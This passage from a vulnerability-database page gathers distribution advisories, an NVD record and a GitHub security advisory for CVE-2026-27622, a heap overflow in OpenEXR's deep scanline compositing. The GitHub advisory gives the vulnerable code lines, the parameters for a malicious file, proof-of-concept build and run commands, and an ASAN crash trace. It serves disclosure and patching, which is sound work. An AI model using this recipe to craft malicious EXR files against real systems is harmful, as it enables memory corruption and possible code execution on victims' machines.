"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.aarch64",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.ppc64le",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.s390x",
"openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.x86_64",
"openSUSE Leap 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:03:06Z",
"details": "important"
}
],
"title": "CVE-2026-27622"
}
]
}
alsa-2026:7682
Vulnerability from osv_almalinux
OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:7682",
"modified": "2026-04-14T12:33:23Z",
"published": "2026-04-13T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/10/ALSA-2026-7682.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: openexr security update"
}
alsa-2026:8888
Vulnerability from osv_almalinux
OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:8888",
"modified": "2026-04-20T08:30:11Z",
"published": "2026-04-20T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/9/ALSA-2026-8888.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: openexr security update"
}
alsa-2026:8863
Vulnerability from osv_almalinux
OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "OpenEXR-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.0-12.el8_10.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "OpenEXR-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.0-12.el8_10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:8863",
"modified": "2026-04-30T07:37:50Z",
"published": "2026-04-20T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/8/ALSA-2026-8863.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: OpenEXR security update"
}
FKIE_CVE-2026-27622
Vulnerability from fkie_nvd - Published: 2026-03-03 23:15 - Updated: 2026-03-05 21:07| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963 | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "637078D8-68DE-478F-B304-A08E80A7609C",
"versionEndExcluding": "3.2.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "529003A0-284B-4A1F-B4FF-CABB9A7534B5",
"versionEndExcluding": "3.3.8",
"versionStartIncluding": "3.3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44066539-F7B6-415A-AE11-0F80BB8741D7",
"versionEndExcluding": "3.4.6",
"versionStartIncluding": "3.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6."
},
{
"lang": "es",
"value": "OpenEXR proporciona la especificaci\u00f3n y la implementaci\u00f3n de referencia del formato de archivo EXR, un formato de almacenamiento de im\u00e1genes para la industria cinematogr\u00e1fica. En CompositeDeepScanLine::readPixels, los totales por p\u00edxel se acumulan en vector total_sizes para grandes recuentos controlados por el atacante en muchas partes, total_sizes[ptr] se ajusta m\u00f3dulo 2^32. overall_sample_count se deriva entonces de los totales ajustados y se utiliza en samples[channel].resize(overall_sample_count). La configuraci\u00f3n/consumo del puntero de decodificaci\u00f3n procede con recuentos de muestras verdaderos, y las operaciones de escritura en el desempaquetado central (generic_unpack_deep_pointers) desbordan el b\u00fafer de muestras compuesto de tama\u00f1o insuficiente. Esta vulnerabilidad se corrige en las versiones v3.2.6, v3.3.8 y v3.4.6."
}
],
"id": "CVE-2026-27622",
"lastModified": "2026-03-05T21:07:05.753",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-03T23:15:55.737",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-CR4V-6JM6-4963
Vulnerability from github – Published: 2026-03-02 18:30 – Updated: 2026-03-04 02:00Summary
Function: CompositeDeepScanLine::readPixels, reachable from high-level multipart deep read flows (MultiPartInputFile + DeepScanLineInputPart + CompositeDeepScanLine).
Vulnerable lines (src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp):
- total_sizes[ptr] += counts[j][ptr]; (line ~511)
- overall_sample_count += total_sizes[ptr]; (line ~514)
- samples[channel].resize (overall_sample_count); (line ~535)
Impact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in generic_unpack_deep_pointers (src/lib/OpenEXRCore/unpack.c:1374) (DoS/Crash, memory corruption/RCE).
Attack scenario:
- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.
- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.
- The overflow happens in composite sample accounting (unsigned int), while pointer progression for decode uses larger counters and reaches out-of-bounds.
Tested on: OpenEXR 4.0.0-dev (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0
Steps to reproduce
composite_deepscanline_poc_bundle.patch
PoC files used:
- Writer/generator: poc/composite_deep_scanline_e2e_compressed_poc.cpp
- Minimal high-level reader harness: poc/simple_exr_reader.cpp
The reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select DEEPSCANLINE, add sources to CompositeDeepScanLine, bind a normal FrameBuffer, then call readPixels.
Build with ASAN/UBSAN:
cmake -S . -B build-asan \
-DOPENEXR_BUILD_POC=ON \
-DCMAKE_BUILD_TYPE=RelWithDebInfo \
-DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \
-DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \
-DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \
-DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'
cmake --build build-asan --target composite_writer simple_exr_reader -j
Generate malicious file (decode-path focused profile):
ASAN_OPTIONS=detect_leaks=0 timeout 180s \
./build-asan/poc/composite_writer \
--profile low-ram \
--file /tmp/composite_decode_focus.exr
Trigger:
ASAN_OPTIONS=detect_leaks=0 timeout 30s \
./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr
ASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.
Example runs
Writer (abbrev):
❯ ./build-asan/poc/composite_writer
exploit math:
benign samples : 300
malicious parts : 86
malicious samples per part : 50000000
true total samples : 4300000300
uint32 overflow reached : yes
wrapped uint32 total : 5033004
composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)
per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)
min parts to overflow (current benign/samples): 86
writing compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr
writing donor malicious part (50000000 samples)
copying malicious part 1/86 from donor chunk
...
file size: 26112896 bytes (24.90 MiB)
Reader ASAN crash:
❯ ./build-asan/poc/simple_exr_reader
reading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts
=================================================================
==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670
WRITE of size 4 at 0x7ed1a55d90b0 thread T0
#0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374
#1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664
#2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816
#3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568
#4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576
#5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88
#6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360
#8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)
0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)
allocated by thread T0 here:
#0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
#1 0x7ed1dbc29600 in std::__new_allocator<float>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151
#2 0x7ed1dbc29600 in std::allocator_traits<std::allocator<float> >::allocate(std::allocator<float>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482
#3 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381
#4 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378
#5 0x7ed1dbc29600 in std::vector<float, std::allocator<float> >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663
#6 0x7ed1dbc00184 in std::vector<float, std::allocator<float> >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016
#7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535
#8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88
#9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360
#11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers
Shadow bytes around the buggy address:
0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa
0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==175024==ABORTING
Root cause analysis
In CompositeDeepScanLine::readPixels:
- Per-pixel totals are accumulated in
vector<unsigned int> total_sizes. - For attacker-controlled large counts across many parts,
total_sizes[ptr]wraps modulo2^32. overall_sample_countis then derived from wrapped totals and used insamples[channel].resize(overall_sample_count).- Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (
generic_unpack_deep_pointers) overrun the undersized composite sample buffer.
Allocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.
Impact
Heap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "3.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "3.4.0"
},
{
"fixed": "3.4.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27622"
],
"database_specific": {
"cwe_ids": [
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T18:30:20Z",
"nvd_published_at": "2026-03-03T23:15:55Z",
"severity": "HIGH"
},
"details": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . -B build-asan \\\n -DOPENEXR_BUILD_POC=ON \\\n -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n -DCMAKE_C_FLAGS=\u0027-fsanitize=address,undefined -fno-omit-frame-pointer\u0027 \\\n -DCMAKE_CXX_FLAGS=\u0027-fsanitize=address,undefined -fno-omit-frame-pointer\u0027 \\\n -DCMAKE_EXE_LINKER_FLAGS=\u0027-fsanitize=address,undefined\u0027 \\\n -DCMAKE_SHARED_LINKER_FLAGS=\u0027-fsanitize=address,undefined\u0027\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n ./build-asan/poc/composite_writer \\\n --profile low-ram \\\n --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n\u276f ./build-asan/poc/composite_writer\nexploit math:\n benign samples : 300\n malicious parts : 86\n malicious samples per part : 50000000\n true total samples : 4300000300\n uint32 overflow reached : yes\n wrapped uint32 total : 5033004\n composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)\n per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n\u276f ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const\u0026, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n #1 0x7ed1dbc29600 in std::__new_allocator\u003cfloat\u003e::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n #2 0x7ed1dbc29600 in std::allocator_traits\u003cstd::allocator\u003cfloat\u003e \u003e::allocate(std::allocator\u003cfloat\u003e\u0026, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n #3 0x7ed1dbc29600 in std::_Vector_base\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n #4 0x7ed1dbc29600 in std::_Vector_base\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n #5 0x7ed1dbc29600 in std::vector\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n #6 0x7ed1dbc00184 in std::vector\u003cfloat, std::allocator\u003cfloat\u003e \u003e::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow 